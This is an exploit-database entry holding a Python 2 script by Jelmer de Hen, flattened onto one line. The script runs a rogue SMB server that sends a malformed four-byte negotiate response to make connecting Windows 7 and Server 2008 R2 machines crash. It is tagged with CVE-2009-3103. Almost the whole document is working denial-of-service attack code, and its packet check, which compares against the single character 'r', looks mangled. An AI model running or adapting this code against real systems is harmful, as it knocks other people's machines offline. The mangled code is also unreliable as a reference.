#!/usr/bin/python # === EDIT – this exploit appears to be exactly the same one of one which was already found # and fixed notified by Laurent Gaffié, i did not know this but his blog post can be found here: # http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html import socket,sys,time print "Maliformed negotiate protocol response and quickly closing the connection causes Windows machines supporting SMB2 to crash (leaves the system hanging and unresponsive) -- tested on Win 7 build 2600" print "Written by Jelmer de Hen" print "Published at http://h.ackack.net/?p=387" smb = socket.socket(socket.AF_INET, socket.SOCK_STREAM) smb.bind(("", 445)) smb.listen(1) smbconn, addr = smb.accept() print "[+] "+str(addr)+" is trying to make connection to us over port 445" while 1: new_packet = smbconn.recv(1024) print "[+] Waiting for a negotiate request packet" if new_packet=="r": print "[+] Received the negotiate request packet injecting the 4 bytes now..." smbconn.send("\x00\x00\x00\x01") break print "[+] Closing connection... This is part of the exploit" smbconn.close() print "[+] Done, if all went good then the box on the other side crashed"
Related ExploitsTrying to match CVEs (1): CVE-2009-3103
Trying to match OSVDBs (1): 57799
Other Possible E-DB Search Terms: Microsoft Windows